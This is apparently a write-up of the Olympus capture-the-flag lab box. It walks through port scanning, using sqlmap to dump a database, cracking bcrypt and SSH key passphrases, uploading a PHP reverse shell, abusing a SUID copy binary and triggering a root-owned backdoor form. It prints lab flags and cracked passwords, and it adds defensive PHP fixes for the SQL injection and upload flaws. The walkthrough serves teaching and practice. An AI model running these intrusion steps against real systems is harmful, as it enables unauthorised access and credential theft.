nmap -sC -sV -T4 $IP -oN initial.nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-20 19:28 BST
Nmap scan report for 10.10.39.133
Host is up (0.056s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 0a:78:14:04:2c:df:25:fb:4e:a2:14:34:80:0b:85:39 (RSA)
|   256 8d:56:01:ca:55:de:e1:7c:64:04:ce:e6:f1:a5:c7:ac (ECDSA)
|_  256 1f:c1:be:3f:9c:e7:8e:24:33:34:a6:44:af:68:4c:3c (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://olympus.thm
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The initial nmap scan shows only two open ports, so this will be a deep dive into the web app.
Adding olympus.thm to /etc/hosts gives us this landing page. Time to run some more enumeration.

Gobuster gives some results, including ~webmaster and phpmyadmin. The phpmyadmin result appears to be a red herring.
The webmaster URL contains posts suggesting that members are using weak passwords, which may well be brute-forceable should we be able to harvest some useful creds.
Running some basic LFI tests on the page comes up dry, but there’s a login form that appears vulnerable to SQLi, so I get SQLmap to work dumping the database (because I suck at SQLi). A little tip for easy SQLmap syntax: submit a POST request to the form, grab the request in Firefox’s Network tab and copy it as cURL.

[19:52:06] [INFO] fetching tables for database: 'olympus'
[19:52:06] [INFO] fetching number of tables for database 'olympus'
[19:52:06] [INFO] retrieved: 6
[19:52:31] [INFO] retrieved: categories
[19:56:15] [INFO] retrieved: chats
[19:58:02] [INFO] retrieved: comments
[20:01:21] [INFO] retrieved: flag
[20:03:00] [INFO] retrieved: posts
[20:05:46] [INFO] retrieved: users

Unsurprisingly, the first flag can be found inside the flag table.

+---------------------------+
| flag                      |
+---------------------------+
| flag{Sm4rt!_k33P_d1gGIng} |
+---------------------------+

From the users table a set of credentials for the user prometheus can be retrieved, along with a hashed password. There’s a column named “randsalt” so I’d assumed the hash would be salted, but the fields were empty. We get the Bcrypt hash and crack it for the user’s password.

$2y$10$YC6uoMwK9VpB5QL513vfLu1RV2sgBf01c0lzPHcz1qK2EArDvnj3C:summertime
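The two application weaknesses above (a login query that sqlmap could drive, and a password table with a hand-rolled, unused randsalt column) are both addressed in the following login handler. This is an added example and not the Olympus CMS code; the DSN, the users table and its id/username/password columns are assumptions.

```php
<?php
// Added example (not the Olympus CMS code). Assumed schema: users(id, username, password).
// The weakness sqlmap exploited is user input concatenated into the SQL string; the fix
// below sends the SQL text and the values to the server separately.
declare(strict_types=1);

function connect(): PDO {
    return new PDO('mysql:host=127.0.0.1;dbname=olympus;charset=utf8mb4', 'app', 'secret', [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepared statements
    ]);
}

function login(PDO $pdo, string $username, string $password): ?array {
    // Parameterised query: quotes, comment sequences or UNIONs in $username stay data.
    $stmt = $pdo->prepare('SELECT id, username, password FROM users WHERE username = ? LIMIT 1');
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // Verify against a dummy hash when the user does not exist, so the response
    // time does not reveal which usernames are valid.
    $hash = $row['password'] ?? password_hash('dummy-not-a-real-password', PASSWORD_BCRYPT);
    if ($row === false || !password_verify($password, $hash)) {
        return null;
    }

    // A $2y$ bcrypt string already embeds its own random salt, which is why the
    // empty "randsalt" column in the dump adds nothing. Upgrade the cost over time.
    if (password_needs_rehash($hash, PASSWORD_BCRYPT, ['cost' => 12])) {
        $upd = $pdo->prepare('UPDATE users SET password = ? WHERE id = ?');
        $upd->execute([password_hash($password, PASSWORD_BCRYPT, ['cost' => 12]), $row['id']]);
    }
    unset($row['password']);
    return $row;
}

function register(PDO $pdo, string $username, string $password): void {
    // password_hash() generates the salt itself; never store a separate one.
    $stmt = $pdo->prepare('INSERT INTO users (username, password) VALUES (?, ?)');
    $stmt->execute([$username, password_hash($password, PASSWORD_BCRYPT, ['cost' => 12])]);
}
```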
Unfortunately this doesn’t let us log in to the SSH server, only into the CMS, and after a lot of hunting I conclude there are no exploits available for it. There is, however, another subdomain revealed during enumeration which takes us to a chat app with upload functionality and an apparent /uploads/ folder. The chat log mentions the app changing file names, but it doesn’t seem to care what extension a file is given. Uploading a PHP reverse shell seems perfectly acceptable, and after checking the files column of the chat table we can pop a shell as www-data on the box.
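The chat app's mistake was renaming the file but keeping the client-supplied extension, and then serving the result straight from a web-reachable /uploads/ folder. The handler below is an added example (not the chat app's own code) of doing both parts properly; the upload directory path and the allow-list are assumptions.

```php
<?php
// Added example (not the Olympus chat app code). UPLOAD_DIR is an assumed path
// outside the Apache document root, so nothing stored there is ever executed as PHP.
declare(strict_types=1);

const UPLOAD_DIR = '/var/lib/chatapp/uploads';
const MAX_BYTES  = 2 * 1024 * 1024;
// Allow-list keyed by the MIME type detected from the bytes, never by the uploaded name.
const ALLOWED = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif', 'application/pdf' => 'pdf'];

function storeUpload(array $file): string {
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('rejected');
    }
    // Sniff the real content type; a file full of PHP reports text/x-php or
    // text/plain, neither of which is on the allow-list.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED[$mime])) {
        throw new RuntimeException('type not allowed: ' . $mime);
    }
    // Random name and an extension chosen by us: "shell.php" cannot survive the rename.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640); // readable by the app, never executable
    return $name;
}

// Files are streamed through this function by name, not linked as /uploads/<name>.
function serveUpload(string $name): void {
    if (!preg_match('/^[0-9a-f]{32}\.(png|jpg|gif|pdf)$/', $name)) {
        http_response_code(404);
        return;
    }
    $path = UPLOAD_DIR . '/' . $name;
    if (!is_file($path)) {
        http_response_code(404);
        return;
    }
    $mime = array_search(pathinfo($name, PATHINFO_EXTENSION), ALLOWED, true);
    header('Content-Type: ' . $mime);
    header('Content-Disposition: attachment; filename="' . $name . '"');
    header('X-Content-Type-Options: nosniff'); // browsers must not re-sniff as HTML/script
    readfile($path);
}
```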

Inside /home/zeus/ the second flag can be found, and now it’s time to enumerate and find a way to escalate.
It appears that www-data can run a SUID binary, CPUtils, that copies arbitrary files as the user zeus. Using this it’s possible to copy zeus’s id_rsa from the .ssh folder and drop it into a readable file inside /tmp/.
Before logging in, the SSH key needs cracking so we can obtain its passphrase.

┌──(kali㉿kali)-[~/Desktop/thm/olympus]
└─$ ssh2john id_rsa > id_rsa.hash

┌──(kali㉿kali)-[~/Desktop/thm/olympus]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
snowflake        (id_rsa)
1g 0:00:00:29 DONE (2022-08-21 14:59) 0.03334g/s 51.21p/s 51.21c/s 51.21C/s 234567..mexico1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

zeus@olympus:~$ id
uid=1000(zeus) gid=1000(zeus) groups=1000(zeus),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev)
There’s no obvious misconfiguration for zeus, but after some rooting around a folder named 0aB44fdS3eDnLkpsz3deGv8TttR4sc can be found in /var/www/html. Navigating directly to the URL presents a login form, whose password can be found inside VIGQFQFMYOST.php.

<?php
$pass = "a7c5ffcf139742f52a5267c4a0674129";
if(!isset($_POST["password"]) || $_POST["password"] != $pass)
    die('<form name="auth" method="POST">Password: <input type="password" name="password" /></form>');
..........

The form gives away the syntax, and the script is effectively a PHP reverse shell like our initial foothold, except that this file is owned by root rather than www-data, so it pops a shell as root!

Heading to /root/root.flag we get flag 3 and a hint that there’s a secret to be found. Generating some SSH keys will make this a bit less painful.

root@olympus:/etc# grep -irl flag{
ssl/private/.b0nus.fl4g

Some quick digging and the bonus flag is found.
This was a fun box. Blind SQLi takes time, which made the box feel longer than it was, but the path to root was fun.